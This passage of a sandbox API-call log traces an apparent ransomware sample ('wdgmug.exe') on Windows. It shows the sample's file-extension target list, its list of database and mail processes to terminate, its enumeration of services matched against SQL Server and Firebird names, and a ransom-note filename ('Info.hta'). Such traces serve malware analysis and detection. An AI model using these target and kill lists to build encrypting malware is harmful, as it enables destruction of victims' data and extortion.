(lpString="Info.hta") returned 8 [0158.061] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74eb88 | out: hHeap=0x710000) returned 1 [0158.061] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x79dba0, nSize=0x7fff | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\wdgmug.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\wdgmug.exe")) returned 0x22 [0158.061] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x79dba0 | out: hHeap=0x710000) returned 1 [0158.062] lstrlenW (lpString="wdgmug.exe") returned 10 [0158.062] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74e8e0, Size=0x40) returned 0x72a540 [0158.062] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79cb38, Size=0x20) returned 0x74ec00 [0158.063] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79cbb0, Size=0x20) returned 0x74e9f8 [0158.063] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74e9f8, Size=0x40) returned 0x72a270 [0158.063] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x72a270, Size=0x80) returned 0x754b78 [0158.063] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x754b78, Size=0x100) returned 0x755fd0 [0158.063] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0158.063] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x755fd0 | out: hHeap=0x710000) returned 1 [0158.063] ExpandEnvironmentStringsW (in: lpSrc="%windir%;", lpDst=0x79dba0, nSize=0x8000 | out: lpDst="C:\\WINDOWS;") returned 0xc [0158.063] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7adba8 | out: hHeap=0x710000) returned 1 [0158.064] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x79dba0 | out: hHeap=0x710000) returned 1 [0158.064] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79d150, Size=0x8) returned 0x79cff0 [0158.065] lstrlenW (lpString="%windir%;") returned 9 [0158.065] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74ec00 | out: hHeap=0x710000) returned 1 [0158.065] lstrlenW (lpString="C:\\WINDOWS;") returned 11 [0158.065] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x78af78 | out: hHeap=0x710000) returned 1 [0158.065] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79c9a0, Size=0x20) returned 0x74ebd8 [0158.065] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74ebd8, Size=0x40) returned 0x72a078 [0158.065] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x72a078, Size=0x80) returned 0x7549e0 [0158.065] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7549e0, Size=0x100) returned 0x755fd0 [0158.065] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79d1a0, Size=0x8) returned 0x79d180 [0158.065] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79d180, Size=0x10) returned 0x79cb08 [0158.065] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79cb08, Size=0x20) returned 0x74e7f0 [0158.065] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79d000, Size=0x8) returned 0x79d0e0 [0158.065] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79d020, Size=0x8) returned 0x79d000 [0158.065] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79d1a0, Size=0x8) returned 0x79d030 [0158.066] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79d030, Size=0x10) returned 0x79c958 [0158.066] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79c958, Size=0x20) returned 0x74ea48 [0158.066] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79d0e0, Size=0x10) returned 0x79cbb0 [0158.066] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79d000, Size=0x10) returned 0x79cb68 [0158.066] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79d000, Size=0x8) returned 0x79d020 [0158.066] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79d060, Size=0x8) returned 0x79d160 [0158.066] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79cbb0, Size=0x20) returned 0x74eb88 [0158.066] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79cb68, Size=0x20) returned 0x74eae8 [0158.066] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79d090, Size=0x8) returned 0x79d050 [0158.066] lstrlenW (lpString="doc(.doc;.docx;.pdf;.xls;.xlsx;.ppt;)arc(.zip;.rar;.bz2;.7z;)dbf(.dbf;)1c8(.1cd;)jpg(.jpg;)") returned 91 [0158.066] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x755fd0 | out: hHeap=0x710000) returned 1 [0158.066] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79c940, Size=0x20) returned 0x74e958 [0158.066] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%", lpDst=0x78af78, nSize=0x7fff | out: lpDst="C:") returned 0x3 [0158.066] lstrlenW (lpString="C:\\") returned 3 [0158.066] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x19fca4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x19fca4*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0158.067] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x78af78 | out: hHeap=0x710000) returned 1 [0158.067] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79d000, Size=0x82) returned 0x756060 [0158.067] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79d140, Size=0x100) returned 0x7560f0 [0158.067] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x756060, Size=0x104) returned 0x756318 [0159.920] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7560f0, Size=0x200) returned 0x76d290 [0159.921] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x7561f8, Size=0x104) returned 0x76d498 [0159.921] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x754050, Size=0x100) returned 0x7560f0 [0159.922] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x79cfc0 | out: hHeap=0x710000) returned 1 [0159.922] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x76d290 | out: hHeap=0x710000) returned 1 [0159.922] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x79cb68 | out: hHeap=0x710000) returned 1 [0159.922] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x754848 | out: hHeap=0x710000) returned 1 [0159.922] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x79cb20 | out: hHeap=0x710000) returned 1 [0159.922] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x754ea8 | out: hHeap=0x710000) returned 1 [0159.922] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x79caa8 | out: hHeap=0x710000) returned 1 [0159.922] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x756318 | out: hHeap=0x710000) returned 1 [0159.922] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x79ca78 | out: hHeap=0x710000) returned 1 [0159.922] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x76d498 | out: hHeap=0x710000) returned 1 [0159.922] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x79cb80 | out: hHeap=0x710000) returned 1 [0159.922] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x756288 | out: hHeap=0x710000) returned 1 [0159.922] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x79cbb0 | out: hHeap=0x710000) returned 1 [0159.922] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x6) returned 0x79d1b0 [0159.922] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76a9a8 [0159.922] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76a9a8, Size=0x20) returned 0x74e8e0 [0159.922] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74e8e0, Size=0x40) returned 0x729fa0 [0159.922] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76aa50 [0159.922] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x79d100 | out: hHeap=0x710000) returned 1 [0159.922] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x79c940 | out: hHeap=0x710000) returned 1 [0159.922] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x755fd0 | out: hHeap=0x710000) returned 1 [0159.922] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x79ca60 | out: hHeap=0x710000) returned 1 [0159.922] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7560f0 | out: hHeap=0x710000) returned 1 [0159.922] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x79cb08 | out: hHeap=0x710000) returned 1 [0159.922] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x79d1a0 | out: hHeap=0x710000) returned 1 [0159.922] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x79c8f8 | out: hHeap=0x710000) returned 1 [0159.922] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7260a8 | out: hHeap=0x710000) returned 1 [0159.923] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x725210 | out: hHeap=0x710000) returned 1 [0159.923] lstrlenW (lpString="%systemdrive%") returned 13 [0159.923] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x74e958 | out: hHeap=0x710000) returned 1 [0159.923] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7545a0 | out: hHeap=0x710000) returned 1 [0159.923] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x79d180 | out: hHeap=0x710000) returned 1 [0159.923] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x2c) returned 0x72d5a0 [0159.923] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x2000) returned 0x76d290 [0159.923] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4091f0, lpParameter=0x77af58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x28c [0159.924] WaitForMultipleObjects (nCount=0x2, lpHandles=0x72b030*=0x260, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0xf6c Thread: id = 4 os_tid = 0xfac [0159.893] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76a930 [0159.893] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76a930, Size=0x20) returned 0x74ebd8 [0159.893] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74ebd8, Size=0x40) returned 0x72a390 [0159.893] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x72a390, Size=0x80) returned 0x754f30 [0159.893] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x754f30, Size=0x100) returned 0x76b010 [0159.893] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76ade0 [0159.893] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76ade0, Size=0x20) returned 0x74e9a8 [0159.893] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x74e9a8, Size=0x40) returned 0x72a078 [0159.893] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x72a078, Size=0x80) returned 0x754518 [0159.893] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x754518, Size=0x100) returned 0x76b118 [0159.893] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x76aa38 [0159.893] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x4) returned 0x79d060 [0159.893] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x10) returned 0x76a990 [0159.893] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79d060, Size=0x8) returned 0x79d130 [0159.893] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x14) returned 0x725250 [0159.893] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79d130, Size=0x10) returned 0x76ab58 [0159.893] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x18) returned 0x725430 [0159.893] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x1a) returned 0x74ebd8 [0159.894] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76ab58, Size=0x20) returned 0x74e9f8 [0159.894] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x1c) returned 0x74ec28 [0159.894] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x16) returned 0x7251d0 [0159.894] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x1a) returned 0x74e868 [0159.894] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xc) returned 0x76a960 [0159.894] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x4) returned 0x79d000 [0159.894] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x40) returned 0x72a660 [0159.894] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79d000, Size=0x8) returned 0x79d090 [0159.894] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x3c) returned 0x72a588 [0159.894] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x79d090, Size=0x10) returned 0x76aae0 [0159.894] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x14) returned 0x725450 [0159.894] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x18) returned 0x725230 [0159.894] RtlReAllocateHeap (Heap=0x710000, Flags=0x0, Ptr=0x76aae0, Size=0x20) returned 0x74e890 [0159.894] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x24) returned 0x726258 [0159.894] lstrlenW (lpString="1c8.exe;1cv77.exe;outlook.exe;postgres.exe;mysqld-nt.exe;mysqld.exe;sqlservr.exe;") returned 81 [0159.894] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x76b010 | out: hHeap=0x710000) returned 1 [0159.894] lstrlenW (lpString="FirebirdGuardianDefaultInstance;FirebirdServerDefaultInstance;sqlwriter;mssqlserver;sqlserveradhelper;") returned 102 [0159.894] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x76b118 | out: hHeap=0x710000) returned 1 [0159.894] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x74ea70 [0159.896] EnumServicesStatusExW (in: hSCManager=0x74ea70, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0) returned 0 [0159.897] GetLastError () returned 0xea [0159.897] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0x1dfc) returned 0x76b778 [0159.897] EnumServicesStatusExW (in: hSCManager=0x74ea70, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x76b778, cbBufSize=0x1dfc, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x76b778, pcbBytesNeeded=0x24eff3c, lpServicesReturned=0x24eff54, lpResumeHandle=0x0) returned 1 [0159.899] CloseServiceHandle (hSCObject=0x74ea70) returned 1 [0159.899] lstrlenW (lpString="Appinfo") returned 7 [0159.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0159.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0159.899] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0159.899] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0159.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0159.899] lstrlenW (lpString="AppXSvc") returned 7 [0159.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0159.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0159.899] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0159.899] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0159.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0159.899] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0159.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0159.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0159.899] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0159.900] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0159.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0159.900] lstrlenW (lpString="Audiosrv") returned 8 [0159.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0159.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0159.900] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0159.900] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0159.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0159.900] lstrlenW (lpString="BFE") returned 3 [0159.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0159.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0159.900] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0159.900] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0159.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0159.900] lstrlenW (lpString="BITS") returned 4 [0159.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0159.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0159.900] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0159.900] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0159.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0159.900] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0159.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0159.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0159.900] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0159.900] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0159.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0159.900] lstrlenW (lpString="CDPSvc") returned 6 [0159.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0159.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0159.901] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0159.901] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0159.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0159.901] lstrlenW (lpString="ClickToRunSvc") returned 13 [0159.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0159.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0159.901] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0159.901] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0159.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0159.901] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0159.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0159.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0159.901] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0159.901] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0159.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0159.901] lstrlenW (lpString="CryptSvc") returned 8 [0159.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0159.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0159.901] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0159.901] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0159.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0159.901] lstrlenW (lpString="DcomLaunch") returned 10 [0159.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0159.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0159.901] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0159.901] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0159.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0159.901] lstrlenW (lpString="Dhcp") returned 4 [0159.901] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0159.901] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0159.901] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0159.901] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0159.901] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0159.902] lstrlenW (lpString="Dnscache") returned 8 [0159.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0159.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0159.902] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0159.902] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0159.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0159.902] lstrlenW (lpString="DoSvc") returned 5 [0159.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0159.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0159.902] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0159.902] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0159.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0159.902] lstrlenW (lpString="DPS") returned 3 [0159.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0159.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0159.902] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0159.902] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0159.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0159.902] lstrlenW (lpString="DusmSvc") returned 7 [0159.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0159.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0159.902] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0159.902] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0159.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0159.902] lstrlenW (lpString="EventLog") returned 8 [0159.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0159.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0159.902] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0159.903] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0159.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0159.903] lstrlenW (lpString="EventSystem") returned 11 [0159.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0159.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0159.903] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0159.903] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0159.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0159.903] lstrlenW (lpString="FontCache") returned 9 [0159.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0159.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0159.903] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0159.903] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0159.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0159.903] lstrlenW (lpString="gpsvc") returned 5 [0159.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0159.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0159.903] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0159.903] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0159.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0159.903] lstrlenW (lpString="iphlpsvc") returned 8 [0159.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0159.903] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0159.903] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0159.903] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0159.903] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0159.903] lstrlenW (lpString="KeyIso") returned 6 [0159.903] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0159.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0159.904] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0159.904] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0159.904] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0159.904] lstrlenW (lpString="LanmanServer") returned 12 [0159.904] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0159.904] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0159.904] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0159.904] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0159.904] lstrcmpiW (lpString1="sqlserveradhelper", 